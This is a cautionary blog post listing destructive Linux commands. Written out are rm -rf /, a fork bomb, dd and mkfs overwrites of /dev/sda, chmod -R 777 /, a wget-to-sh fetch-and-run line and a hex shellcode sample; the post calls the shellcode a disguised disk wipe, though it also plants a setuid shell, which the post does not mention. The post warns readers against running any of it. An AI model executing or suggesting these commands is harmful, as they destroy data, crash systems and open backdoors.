Deadly mistakes that you would want to avoid on your Linux box

Linux is a powerful operating system and its command line terminal is even more powerful which can be used to control everything in the os. There are lots of things that you should keep in mind while using the command line terminal so that you don't end up messing up your linux box.

I have collated some of the commands and activities that should be taken care of before execution or should not be at all executed. Some of these require root to be executed while some, in case of Ubuntu, can be executed using the sudo access.

Please make sure you don't run any of these commands or perform any of these activities on your server. In case you want to, do this on some virtual machine.

Here you go!

rm -rf Command

rm -rf command is one of the easiest ways to delete any file or folder in Linux. Almost everyone is aware and takes it in use whenever required.
But, not everyone knows the proper usage of this command and often users are unaware of the consequences the misuse of this command can lead to. The damages caused by the improper usage of this command are unrecoverable.

Let me give you a overview of the usage of rm -rf command.

Syntax of the command is

rm [OPTION] FILE


rm -r    : command deletes the folder recursively, even the empty folder.
rm -f    : command removes ‘Read only File’ without asking.
rm -rf / : Force deletion of everything in root directory.
rm -rf * : Force deletion of everything in present working directory.
rm -rf . : Force deletion of current folder and sub folders.

There are ways to get over the dangers of rm command. Check out one of my previous articles to get over the dangers of rm command.


Disgused version of rm -rf command


There is one more thing you should be aware of, when it comes to rm -rf command. The hex version of this command is easily available over the internet and when run, wipes out the root partition.

The code looks like:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

Please don't use it on your production server by any chance.


 Use of Fork bombs

In computing, a fork bomb (also called rabbit virus or wabbit ) is a denial-of-service attack whereby a process continually replicates itself to deplete available system resources.

Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. A basic implementation of a fork bomb is an infinite loop that repeatedly launches the same process.

There are several versions of fork bombs available on the internet, the following being the most common.

:(){:|:&};:

It keeps on executing again and again till the system freezes.

Check out this article to know more about fork bombs and to be aware of the other versions of fork bomb available.


Improper use of chattr command

chattr command is used to change the file attributes on a Linux file system. But using it in a wrong way can render your user account unusable.

Let me give you an overview of chattr command.

Syntax of chattr command is:

chattr  [operator] [switch]  [file name]

Running the following command sets the i attribute recursively on the user home directory.
 
chattr +i -R  /home/user


A file or directory with the ‘+i’ attribute cannot be modified, it cannot be deleted or renamed, no link can be created to it and no data can be written. Only the superuser can set or clear this attribute.
To remove the effect of 'i' attribute, it needs to be used with - operator, i.e. '-i'

'-R' recursively changes attributes of directories and their contents.

The operator ‘+’ causes the selected attributes to be added to the existing attributes of the files; ‘-’ causes them to be removed; and ‘=’ causes them to be the only attributes that the files have.

When a user logs in to his/her account, there are several files that get modified and this command prevents the required modification of such files which may result in different kinds of issues for the user.


Setting improper default runlevel

A Linux distro has 7 run levels by default, the purpose of each run level differs as per the distro.

The runlevels used by Redhat/CentOS are:

#   0 - halt
#   1 - Single user mode
#   2 - Multiuser, without NFS (The same as 3, if you do not have       networking)
#   3 - Full multiuser mode
#   4 - unused
#   5 - X11
#   6 - reboot

The default run level for the system is set through the /etc/inittab file. If the inittab file has an entry id:5:initdefault: it making X11 as the default run level for the system. But setting the default runlevel to 6 or 0, the system will shut down/reboot as soon as it enters the runlevel.


Improper use of dd command

dd if=/dev/random of=/dev/sda or  dd if=/dev/null of=/dev/sda or
dd if=/dev/zero of=/dev/sda

Any of the above commands will wipe out the block sda or write random junk data to the block leaving your system in unrecoverable state.

Let me give you an overview of dd command.

dd command is used to perform low-level copying from one location to another.

if=/dev/random - Use /dev/random (random data) as the input

if=/dev/null or if=/dev/zero - Use null or zero as the input

of=/dev/sda - Output to the first hard disk sda, replacing its file system with random garbage data or null


Execution of untrusted package/application

This is something most of us do most of the times. There are times when we have issues in our system and the only thing we care about is getting the issue fixed by any means.We don't always care whether the source of the application/script we are using is trusted or not.

Let me explain with an example.
 
wget http://malicious_source -O- | sh


In the above command wget downloads a file from some malicious source and the output of wget is given as an input to sh command through the pipe. sh executes the file in case it's executable.

The main thing here is the url or the source that should be taken care of.The same thing goes with the rpm or debian packages, make sure you download them from trusted source.


Improper execution of chmod command

chmod stands for change mode; it modifies the mode bits and the extended access control lists (ACLs) of the specified files or directories. Ofcourse, there are ways you may easily misuse the command.

Let me show you with an example.

chmod -R 777 /

This command above grants read, write, and execute (777) permissions to every file for every user under your / making your system vulnerable and unsecure.


Improper use of mkfs command

mkfs.ext4 /dev/sda

The above command when executed, formats the /dev/sda block wiping out all the data from the device leaving your system in unrecoverable state.
In case you need to execute the above command to format some partition or block, please make sure you know the proper usage of the command.


 mkfs.ext4 – Create a new ext4 file system on the following device.

/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Improper use of > operator

> file

The above command when executed flushes the content of file. Very simple yet very dangerous; dangerous when you end up flushing the content of the configuration file of your server. So, take care while using the > opearator.


Well,that’s all folks! There are obviously lot more deadly commands that may leave the system unusable. Leave us comments and let other users know about them.

You will surely love these:

Reasons you might not consider Linux over Windows
Working with modules in Linux made easy


Related

open source 504830302936118657

Post a Comment

emo-but-icon

Translate

 

Recent Posts

comments

Recent Comments Widget

Join Us

 

Sponsored By

Recommended for you

get social

item